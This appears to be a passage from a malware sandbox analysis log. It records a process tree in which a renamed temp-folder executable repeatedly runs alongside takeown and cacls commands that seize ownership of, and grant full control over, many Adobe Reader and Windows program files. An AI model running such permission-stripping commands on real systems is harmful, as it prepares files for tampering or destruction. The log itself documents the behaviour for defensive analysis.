  3KvhBUKy.exe -accepteula "zx______.pfm" -nobanner
  2⤵
  PID:3280

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca" /E /G Admin:F /C
1⤵
PID:2568

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"
1⤵
PID:1940

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Windows Mail\ja-JP\msoeres.dll.mui"
1⤵
PID:220

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:4700

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula "device.png" -nobanner
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4756

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "device.png" -nobanner
1⤵
PID:3856

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png"
1⤵
- Modifies file permissions
PID:3848

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png" /E /G Admin:F /C
1⤵
PID:4124

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula "ImagingDevices.exe.mui" -nobanner
1⤵
PID:4092

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:3348

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula "msoeres.dll.mui" -nobanner
1⤵
PID:3284

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "msoeres.dll.mui" -nobanner
1⤵
PID:3360

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Windows Mail\ja-JP\msoeres.dll.mui" /E /G Admin:F /C
1⤵
PID:3100

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:3252

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "watermark.png" -nobanner
1⤵
PID:3180

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" /E /G Admin:F /C
1⤵
PID:2856

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:3256

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula "CP1257.TXT" -nobanner
1⤵
PID:3260

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "CP1257.TXT" -nobanner
1⤵
PID:3764
- C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
  3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
  2⤵
  PID:3528
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "JNTFiltr.dll.mui" -nobanner
  2⤵
  PID:2448
- C:\Windows\SysWOW64\takeown.exe
  takeown /F "C:\Program Files\Windows Journal\en-US\JNTFiltr.dll.mui"
  2⤵
  - Modifies file permissions
  PID:2388
- C:\Windows\SysWOW64\cacls.exe
  cacls "C:\Program Files\Windows Journal\en-US\JNTFiltr.dll.mui" /E /G Admin:F /C
  2⤵
  PID:1548

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT"
1⤵
PID:1840

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT" /E /G Admin:F /C
1⤵
PID:3512
- C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
  3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
  2⤵
  PID:1820
- C:\Windows\SysWOW64\takeown.exe
  takeown /F "C:\Program Files (x86)\Windows Mail\WinMail.exe"
  2⤵
  PID:1548
- C:\Windows\SysWOW64\cacls.exe
  cacls "C:\Program Files (x86)\Windows Mail\WinMail.exe" /E /G Admin:F /C
  2⤵
  PID:2608

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:4024

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "CENTEURO.TXT" -nobanner
1⤵
PID:892
- C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
  3KvhBUKy.exe -accepteula "msoeres.dll.mui" -nobanner
  2⤵
  PID:3632

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT"
1⤵
PID:3632

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT" /E /G Admin:F /C
1⤵
PID:3304
- C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
  3KvhBUKy.exe -accepteula "NBMapTIP.dll.mui" -nobanner
  2⤵
  PID:576

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula "can.fca" -nobanner
1⤵
PID:1592

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:2208

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm"
1⤵
PID:2408

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm" /E /G Admin:F /C
1⤵
PID:2440

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:3892

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf"
1⤵
PID:840

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf" /E /G Admin:F /C
1⤵
PID:2496

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula "Identity-H" -nobanner
1⤵
PID:3576

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif"
1⤵
PID:968

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif" /E /G Admin:F /C
1⤵
PID:2688

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:1976
- C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
  3KvhBUKy.exe -accepteula "reviews_super.gif" -nobanner
  2⤵
  PID:3976

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig"
1⤵
PID:4976
- C:\Windows\SysWOW64\takeown.exe
  takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf"
  2⤵
  PID:4884
- - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
    3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2308
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt"
    3⤵
    PID:2800
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt" /E /G Admin:F /C
    3⤵
    PID:3504
- C:\Windows\SysWOW64\cacls.exe
  cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf" /E /G Admin:F /C
  2⤵
  PID:2308

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig" /E /G Admin:F /C
1⤵
PID:2828

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:2624

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula "ImagingDevices.exe.mui" -nobanner
1⤵
PID:5072

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "ImagingDevices.exe.mui" -nobanner
1⤵
PID:5020

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui" /E /G Admin:F /C
1⤵
PID:5028

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:4948

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula "Music.jtp" -nobanner
1⤵
PID:5068

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "Music.jtp" -nobanner
1⤵
PID:2348

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files\Windows Journal\Templates\Music.jtp"
1⤵
PID:4600

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:4436

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula "PDIALOG.exe" -nobanner
1⤵
PID:4544

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "PDIALOG.exe" -nobanner
1⤵
PID:4784

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files\Windows Journal\PDIALOG.exe" /E /G Admin:F /C
1⤵
PID:4164
- C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
  3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
  2⤵
  PID:3744
- - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
    3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3856
  - - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
      3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
      4⤵
      PID:4172
  - - C:\Windows\SysWOW64\takeown.exe
      takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif"
      4⤵
      PID:4212
  - - C:\Windows\SysWOW64\cacls.exe
      cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif" /E /G Admin:F /C
      4⤵
      PID:4124
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "MyriadCAD.otf" -nobanner
    3⤵
    PID:4240
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf"
    3⤵
    PID:4752
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf" /E /G Admin:F /C
    3⤵
    PID:4228
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "msoeres.dll.mui" -nobanner
  2⤵
  PID:4388
- C:\Windows\SysWOW64\takeown.exe
  takeown /F "C:\Program Files\Windows Mail\it-IT\msoeres.dll.mui"
  2⤵
  PID:4136
- C:\Windows\SysWOW64\cacls.exe
  cacls "C:\Program Files\Windows Mail\it-IT\msoeres.dll.mui" /E /G Admin:F /C
  2⤵
  PID:4724

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula "JNTFiltr.dll.mui" -nobanner
1⤵
PID:4684

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:4708

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "PDIALOG.exe.mui" -nobanner
1⤵
PID:4244

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files\Windows Journal\fr-FR\PDIALOG.exe.mui"
1⤵
- Modifies file permissions
PID:3364
- C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
  3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
  2⤵
  PID:3624
- C:\Windows\SysWOW64\takeown.exe
  takeown /F "C:\Program Files\Windows Journal\Templates\Genko_2.jtp"
  2⤵
  PID:4276
- C:\Windows\SysWOW64\cacls.exe
  cacls "C:\Program Files\Windows Journal\Templates\Genko_2.jtp" /E /G Admin:F /C
  2⤵
  PID:228

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files\Windows Journal\fr-FR\PDIALOG.exe.mui" /E /G Admin:F /C
1⤵
PID:3624

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:3652

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula "Journal.exe.mui" -nobanner
1⤵
PID:3168

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "Journal.exe.mui" -nobanner
1⤵
PID:3588

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files\Windows Journal\de-DE\Journal.exe.mui"
1⤵
- Modifies file permissions
PID:3112

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files\Windows Journal\de-DE\Journal.exe.mui" /E /G Admin:F /C
1⤵
PID:4252

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:960

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui"
1⤵
PID:3256

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui" /E /G Admin:F /C
1⤵
PID:3940

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Windows Mail\fr-FR\msoeres.dll.mui"
1⤵
PID:3000
- C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
  3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
  2⤵
  PID:3944
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "msoeres.dll.mui" -nobanner
  2⤵
  PID:2792
- C:\Windows\SysWOW64\cacls.exe
  cacls "C:\Program Files (x86)\Windows Mail\de-DE\msoeres.dll.mui" /E /G Admin:F /C
  2⤵
  PID:1792

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Windows Mail\fr-FR\msoeres.dll.mui" /E /G Admin:F /C
1⤵
PID:4016

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "17223285811777019102819485533-169841653152760284096178580817068424531709181806"
1⤵
PID:2804

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:3472

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner
1⤵
PID:3452

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner
1⤵
PID:1176

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets" /E /G Admin:F /C
1⤵
PID:3556

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:2936

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT"
1⤵
PID:3132

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT" /E /G Admin:F /C
1⤵
PID:448

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:1668

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:4592
- C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
  3KvhBUKy.exe -accepteula "PhotoViewer.dll.mui" -nobanner
  2⤵
  PID:4176

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "can32.clx" -nobanner
1⤵
PID:3892

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx"
1⤵
PID:2260

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx" /E /G Admin:F /C
1⤵
PID:4548
- C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
  3KvhBUKy.exe -accepteula "WinMail.exe.mui" -nobanner
  2⤵
  PID:2460

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:2020

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "ZY______.PFB" -nobanner
1⤵
PID:1720

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB" /E /G Admin:F /C
1⤵
PID:788
- C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
  3KvhBUKy.exe -accepteula "TURKISH.TXT" -nobanner
  2⤵
  PID:1072

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:496

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "CourierStd-BoldOblique.otf" -nobanner
1⤵
PID:1388

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf" /E /G Admin:F /C
1⤵
PID:540

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula "turnOnNotificationInAcrobat.gif" -nobanner
1⤵
PID:2988

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:2000

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula "server_ok.gif" -nobanner
1⤵
PID:2060

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "server_ok.gif" -nobanner
1⤵
PID:888

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif"
1⤵
PID:2156
- C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
  3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
  2⤵
  PID:1060
- - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
    3KvhBUKy.exe -accepteula "directories.acrodata" -nobanner
    3⤵
    PID:2192
- C:\Windows\SysWOW64\takeown.exe
  takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt"
  2⤵
  - Modifies file permissions
  PID:3140
- - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
    3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1636
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "CP1254.TXT" -nobanner
    3⤵
    PID:1852
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT"
    3⤵
    - Modifies file permissions
    PID:3988
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT" /E /G Admin:F /C
    3⤵
    PID:3088
- C:\Windows\SysWOW64\cacls.exe
  cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt" /E /G Admin:F /C
  2⤵
  PID:1760

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif" /E /G Admin:F /C
1⤵
PID:1060

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:1476

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif"
1⤵
PID:4928

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif" /E /G Admin:F /C
1⤵
PID:3980
- C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
  3KvhBUKy.exe -accepteula "zdingbat.txt" -nobanner
  2⤵
  PID:2616

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:2320

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula "pmd.cer" -nobanner
1⤵
PID:5012

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "pmd.cer" -nobanner
1⤵
PID:1356

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer"
1⤵
- Modifies file permissions
PID:3672

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer" /E /G Admin:F /C
1⤵
PID:2416

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:4596

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html"
1⤵
PID:2824
- C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
  3KvhBUKy.exe -accepteula "warning.gif" -nobanner
  2⤵
  PID:5052
- - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
    3KvhBUKy.exe -accepteula "DisplayLanguageNames.en_GB.txt" -nobanner
    3⤵
    PID:4960

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html" /E /G Admin:F /C
1⤵
PID:2560
- C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
  3KvhBUKy.exe -accepteula "submission_history.gif" -nobanner
  2⤵
  PID:5044

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "942326955300334877-961701386-1050554577-1927516376-2646614948864813841562733347"
1⤵
PID:692

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:4816
- C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
  3KvhBUKy.exe -accepteula "forms_distributed.gif" -nobanner
  2⤵
  PID:4392
- - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
    3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4460
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif"
    3⤵
    PID:4452
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif" /E /G Admin:F /C
    3⤵
    PID:4820

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula "ImagingDevices.exe.mui" -nobanner
1⤵
PID:4440

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "ImagingDevices.exe.mui" -nobanner
1⤵
PID:4476

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui"
1⤵
PID:4428

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui" /E /G Admin:F /C
1⤵
PID:780
- C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
  3KvhBUKy.exe -accepteula "review_email.gif" -nobanner
  2⤵
  PID:4448

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:2576

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula "PhotoAcq.dll.mui" -nobanner
1⤵
PID:4344
- C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
  3KvhBUKy.exe -accepteula "bl.gif" -nobanner
  2⤵
  PID:4356

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "PhotoAcq.dll.mui" -nobanner
1⤵
PID:4356

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui" /E /G Admin:F /C
1⤵
PID:4784

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula "msoeres.dll.mui" -nobanner
1⤵
PID:3856

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula "Genko_2.jtp" -nobanner
1⤵
PID:204

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:4044

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner
1⤵
PID:4088

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner
1⤵
PID:3564

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files\Windows Journal\ja-JP\MSPVWCTL.DLL.mui"
1⤵
PID:2392

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:1748

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "jnwmon.dll.mui" -nobanner
1⤵
PID:3240

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files\Windows Journal\fr-FR\jnwmon.dll.mui"
1⤵
PID:3276

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files\Windows Journal\fr-FR\jnwmon.dll.mui" /E /G Admin:F /C
1⤵
PID:1664

C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
1⤵
PID:4612
- C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
  3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
  2⤵
  PID:3956
- C:\Windows\SysWOW64\takeown.exe
  takeown /F "C:\Program Files\Windows Journal\Templates\Memo.jtp"
  2⤵
  PID:4312
- C:\Windows\SysWOW64\cacls.exe
  cacls "C:\Program Files\Windows Journal\Templates\Memo.jtp" /E /G Admin:F /C
  2⤵
  PID:4604
